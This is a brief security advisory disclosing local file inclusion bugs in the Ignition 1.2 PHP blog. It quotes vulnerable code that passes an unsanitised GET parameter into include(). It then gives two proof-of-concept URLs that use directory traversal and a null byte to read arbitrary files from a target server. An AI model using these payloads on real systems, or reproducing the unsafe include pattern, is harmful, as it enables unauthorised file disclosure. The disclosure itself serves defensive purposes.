Ignition 1.2 Multiple Local File Inclusion Vulnerabilities
disclosed by cOndemned
download: http://launchpadlibrarian.net/27567060/ignition_1.2.zip
note: magic_quotes_gpc should be turned off in order to exploit this vulnerability
greetz: all friends, SecurityReason team :)
comment.php
1. <?php
2. session_start();
3. require ('settings.php');
4. include ('posts/'.$_GET['blog'].'.txt'); # [1]
5. ?>
view.php
1. <?php
2. session_start();
3. require ('settings.php');
4. $blog = $_GET['blog'];
5. if (file_exists('posts/'.$_GET['blog'].'.txt')) {
6. include ('posts/'.$_GET['blog'].'.txt'); # [2]
7. }else{
proof of concept:
[1] http://[attacked_box]/[ignition1.2]/comment.php?blog=../../../../[local_file]%00
[2] http://[attacked_box]/[ignition1.2]/view.php?blog=../../../../../[local_file]%00